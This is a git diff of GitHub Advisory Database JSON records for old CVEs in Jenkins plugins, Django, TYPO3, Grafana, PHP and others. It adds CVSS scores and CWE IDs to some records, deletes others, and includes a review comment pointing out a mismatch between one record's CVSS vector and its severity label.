--- a/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json
+++ b/advisories/unreviewed/2022/05/GHSA-9r2w-p922-mx3m/GHSA-9r2w-p922-mx3m.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-9r2w-p922-mx3m",
- "modified": "2022-05-01T02:04:33Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-01T02:04:33Z",
 "aliases": [
 "CVE-2005-2059"
 ],
 "details": "Multiple cross-site request forgery (CSRF) vulnerabilities in (1) addaddress.php, (2) toggleignore.php, (3) removeignore.php, and (4) removeaddress.php in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to modify settings as another user via a link or IMG tag.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
@@ -33,7 +36,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-352"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json b/advisories/unreviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json
deleted file mode 100644
index 84d0ffb949ba7..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9r7f-rqhw-j8h8/GHSA-9r7f-rqhw-j8h8.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9r7f-rqhw-j8h8",
- "modified": "2022-05-13T01:18:43Z",
- "published": "2022-05-13T01:18:43Z",
- "aliases": [
- "CVE-2018-1000015"
- ],
- "details": "On Jenkins instances with Authorize Project plugin, the authentication associated with a build may lack the Computer/Build permission on some agents. This did not prevent the execution of Pipeline `node` blocks on those agents due to incorrect permissions checks in Pipeline: Nodes and Processes plugin 2.17 and earlier.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000015"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-01-22/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-01-23T14:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json b/advisories/unreviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json
deleted file mode 100644
index 951c7b3381d2b..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9rx5-w522-5fh7/GHSA-9rx5-w522-5fh7.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9rx5-w522-5fh7",
- "modified": "2022-05-13T01:48:32Z",
- "published": "2022-05-13T01:48:32Z",
- "aliases": [
- "CVE-2018-1000114"
- ],
- "details": "An improper authorization vulnerability exists in Jenkins Promoted Builds Plugin 2.31.1 and earlier in Status.java and ManualCondition.java that allow an attacker with read access to jobs to perform promotions.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000114"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-746"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-863"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-03-13T13:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json b/advisories/unreviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json
deleted file mode 100644
index 72005dc58e5a7..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-9xg7-gg9m-rmq9/GHSA-9xg7-gg9m-rmq9.json
+++ /dev/null
@@ -1,67 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-9xg7-gg9m-rmq9",
- "modified": "2022-05-02T03:37:17Z",
- "published": "2022-05-02T03:37:17Z",
- "aliases": [
- "CVE-2009-2659"
- ],
- "details": "The Admin media handler in core/servers/basehttp.py in Django 1.0 and 0.96 does not properly map URL requests to expected \"static media files,\" which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a crafted URL.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2659"
- },
- {
- "type": "WEB",
- "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00055.html"
- },
- {
- "type": "WEB",
- "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg00069.html"
- },
- {
- "type": "WEB",
- "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=539134"
- },
- {
- "type": "WEB",
- "url": "http://code.djangoproject.com/changeset/11353"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/36137"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/36153"
- },
- {
- "type": "WEB",
- "url": "http://www.djangoproject.com/weblog/2009/jul/28/security/"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2009/07/29/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/35859"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-22"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2009-08-04T16:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json b/advisories/unreviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json
deleted file mode 100644
index cb834f42ee801..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-c3r5-vxj6-62mc/GHSA-c3r5-vxj6-62mc.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-c3r5-vxj6-62mc",
- "modified": "2023-10-25T18:31:24Z",
- "published": "2022-05-24T16:52:46Z",
- "aliases": [
- "CVE-2019-10379"
- ],
- "details": "Jenkins Google Cloud Messaging Notification Plugin 1.0 and earlier stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10379"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-591"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-522"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-08-07T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json b/advisories/unreviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json
deleted file mode 100644
index b11161ece43e7..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-c3wf-rrhq-rfp2/GHSA-c3wf-rrhq-rfp2.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-c3wf-rrhq-rfp2",
- "modified": "2023-10-25T18:31:31Z",
- "published": "2022-05-24T17:03:47Z",
- "aliases": [
- "CVE-2019-16560"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows attackers to perform connection tests and determine whether files with an attacker-specified path exist on the Jenkins master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16560"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1371"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-12-17T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json b/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json
index 21df7281ada2a..096912d6e0a2b 100644
--- a/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json
+++ b/advisories/unreviewed/2022/05/GHSA-c6mp-g88m-3h4r/GHSA-c6mp-g88m-3h4r.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-c6mp-g88m-3h4r",
- "modified": "2022-05-02T03:45:31Z",
+ "modified": "2024-02-08T15:30:26Z",
 "published": "2022-05-02T03:45:31Z",
 "aliases": [
 "CVE-2009-3482"
 ],
 "details": "TrustPort Antivirus before 2.8.0.2266 and PC Security before 2.0.0.1291 use weak permissions (Everyone: Full Control) for files under %PROGRAMFILES%, which allows local users to gain privileges by replacing executables with Trojan horse programs.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -33,7 +36,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-732"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json b/advisories/unreviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json
deleted file mode 100644
index d2d9c602d621d..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-c73w-4rcj-2622/GHSA-c73w-4rcj-2622.json
+++ /dev/null
@@ -1,59 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-c73w-4rcj-2622",
- "modified": "2022-05-02T03:47:10Z",
- "published": "2022-05-02T03:47:10Z",
- "aliases": [
- "CVE-2009-3636"
- ],
- "details": "Cross-site scripting (XSS) vulnerability in the Install Tool subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3636"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53929"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2"
- },
- {
- "type": "WEB",
- "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/37122"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/36801"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2009/3009"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2009-11-02T15:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json b/advisories/unreviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json
deleted file mode 100644
index 743272c776015..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-c8qr-vfjf-62q3/GHSA-c8qr-vfjf-62q3.json
+++ /dev/null
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c8qr-vfjf-62q3", - "modified": "2022-05-13T01:36:51Z", - "published": "2022-05-13T01:36:51Z", - "aliases": [ - "CVE-2017-2654" - ], - "details": "jenkins-email-ext before version 2.57.1 is vulnerable to an Information Exposure. The Email Extension Plugins is able to send emails to a dynamically created list of users based on the changelogs, like authors of SCM changes since the last successful build. This could in some cases result in emails being sent to people who have no user account in Jenkins, and in rare cases even people who were not involved in whatever project was being built, due to some mapping based on the local-part of email addresses.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2654" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2654" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-03-20/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-08-06T22:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json b/advisories/unreviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json deleted file mode 100644 index d0a3188bde5be..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-c9px-7j36-f35v/GHSA-c9px-7j36-f35v.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-c9px-7j36-f35v", - "modified": "2022-05-13T01:48:34Z", - "published": "2022-05-13T01:48:34Z", - "aliases": [ - "CVE-2018-1000189" - ], - "details": "A command execution vulnerability exists in Jenkins Absint Astree Plugin 1.0.5 and older in AstreeBuilder.java that allows attackers with Overall/Read access to execute a command on the Jenkins master.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000189" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-06-04/#SECURITY-807" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-05T20:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json b/advisories/unreviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json deleted file mode 100644 index 56453021c86bb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ccmg-w4xm-p28v/GHSA-ccmg-w4xm-p28v.json +++ /dev/null 
@@ -1,63 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ccmg-w4xm-p28v", - "modified": "2022-05-24T17:16:26Z", - "published": "2022-05-24T17:16:26Z", - "aliases": [ - "CVE-2020-12245" - ], - "details": "Grafana before 6.7.3 allows table-panel XSS via column.title or cellLinkTooltip.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12245" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/pull/23816" - }, - { - "type": "WEB", - "url": "https://community.grafana.com/t/release-notes-v6-7-x/27119" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#673-2020-04-23" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20200511-0001/" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00083.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00009.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00017.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-04-24T21:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json b/advisories/unreviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json deleted file mode 100644 index 21c88eaee05d0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cgr9-h9qq-x9fx/GHSA-cgr9-h9qq-x9fx.json +++ /dev/null 
@@ -1,47 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cgr9-h9qq-x9fx", - "modified": "2022-05-02T06:18:15Z", - "published": "2022-05-02T06:18:14Z", - "aliases": [ - "CVE-2010-1022" - ], - "details": "The TYPO3 Security - Salted user password hashes (t3sec_saltedpw) extension before 0.2.13 for TYPO3 allows remote attackers to bypass authentication via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1022" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38992" - }, - { - "type": "WEB", - "url": "http://typo3.org/extensions/repository/view/t3sec_saltedpw/0.2.13/" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-006/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/38799" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-287" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-03-19T19:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json b/advisories/unreviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json deleted file mode 100644 index 2c6618307aebd..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cq9m-rpm5-27m9/GHSA-cq9m-rpm5-27m9.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cq9m-rpm5-27m9", - "modified": "2022-05-13T01:17:42Z", - "published": "2022-05-13T01:17:42Z", - "aliases": [ - "CVE-2019-1003095" - ], - "details": "Jenkins Perfecto Mobile Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003095" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1061" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-311" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json b/advisories/unreviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json deleted file mode 100644 index 195663cf842cb..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cqp7-hwm3-cfg7/GHSA-cqp7-hwm3-cfg7.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cqp7-hwm3-cfg7", - "modified": "2022-05-13T01:31:34Z", - "published": "2022-05-13T01:31:34Z", - "aliases": [ - "CVE-2019-1003023" - ], - "details": "A cross-site scripting vulnerability exists in Jenkins Warnings Next Generation Plugin 1.0.1 and earlier in src/main/java/io/jenkins/plugins/analysis/core/model/DetailsTableModel.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourceDetail.java, src/main/java/io/jenkins/plugins/analysis/core/model/SourcePrinter.java, src/main/java/io/jenkins/plugins/analysis/core/util/Sanitizer.java, src/main/java/io/jenkins/plugins/analysis/warnings/DuplicateCodeScanner.java that allows attackers with the ability to control warnings parser input to have Jenkins render arbitrary HTML.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003023" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1271" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-06T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json b/advisories/unreviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json deleted file mode 100644 index 5ff69b12056e1..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-crvq-mw2w-4cfx/GHSA-crvq-mw2w-4cfx.json +++ /dev/null 
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-crvq-mw2w-4cfx", - "modified": "2022-05-13T01:48:34Z", - "published": "2022-05-13T01:48:34Z", - "aliases": [ - "CVE-2018-1000197" - ], - "details": "An improper authorization vulnerability exists in Jenkins Black Duck Hub Plugin 3.0.3 and older in PostBuildScanDescriptor.java that allows users with Overall/Read permission to read and write the Black Duck Hub plugin configuration.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000197" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-05-09/#SECURITY-670" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-863" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-06-05T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json b/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json index ded5ef9bda896..5bf89f3e13796 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json +++ b/advisories/unreviewed/2022/05/GHSA-cv8q-mpvf-42h2/GHSA-cv8q-mpvf-42h2.json @@ -40,6 +40,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-362", "CWE-416", "CWE-787" ], diff --git a/advisories/unreviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json b/advisories/unreviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json deleted file mode 100644 index f078c7cd8c223..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cvh8-9j4x-5v4j/GHSA-cvh8-9j4x-5v4j.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cvh8-9j4x-5v4j", - "modified": "2022-05-13T01:18:46Z", - "published": "2022-05-13T01:18:46Z", - "aliases": [ - "CVE-2018-1000424" - ], - "details": "An insufficiently protected credentials vulnerability exists in Jenkins Artifactory Plugin 2.16.1 and earlier in ArtifactoryBuilder.java, CredentialsConfig.java that allows attackers with local file system access to obtain old credentials configured for the plugin before it integrated with Credentials Plugin.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000424" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-265" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/106532" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-01-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json b/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json index 81aa390b4bd68..5f61faca7a51e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json +++ b/advisories/unreviewed/2022/05/GHSA-cwwq-64rr-rv47/GHSA-cwwq-64rr-rv47.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cwwq-64rr-rv47", - "modified": "2022-05-17T05:47:59Z", + "modified": "2024-02-08T21:30:32Z", "published": "2022-05-17T05:47:59Z", "aliases": [ "CVE-2010-1866" ], "details": "The dechunk filter in PHP 5.3 through 5.3.2, when decoding an HTTP chunked encoding stream, allows context-dependent attackers to cause a denial of service (crash) and possibly trigger memory corruption via a negative chunk size, which bypasses a signed comparison, related to an integer overflow in the chunk size decoder.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json b/advisories/unreviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json deleted file mode 100644 index 47610f5fe04f1..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-cwxx-gwwj-pqjq/GHSA-cwxx-gwwj-pqjq.json +++ /dev/null 
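Review bot: The vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` added in the first hunk scores 9.8 (Critical), but the `"severity": "HIGH"` line kept as context in the second hunk is not updated, leaving two severity statements in one record that do not agree. The `details` text establishes a crash from a negative chunk size and only says memory corruption is "possibly" triggered, so the C:H/I:H components appear to rest on the speculative part of the description; if full-impact scoring is the intent, the label should follow with `"severity": "CRITICAL",`, otherwise the vector rather than the label is the part to revisit. `CWE-190` is consistent with the "integer overflow in the chunk size decoder" wording.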
@@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-cwxx-gwwj-pqjq", - "modified": "2022-05-13T01:48:33Z", - "published": "2022-05-13T01:48:33Z", - "aliases": [ - "CVE-2018-1000145" - ], - "details": "An exposure of sensitive information vulnerability exists in Jenkins Perforce Plugin version 1.3.36 and older in PerforcePasswordEncryptor.java that allows attackers with local file system access to obtain encrypted Perforce passwords and decrypt them.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000145" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-03-26/#SECURITY-373" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-04-05T13:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json 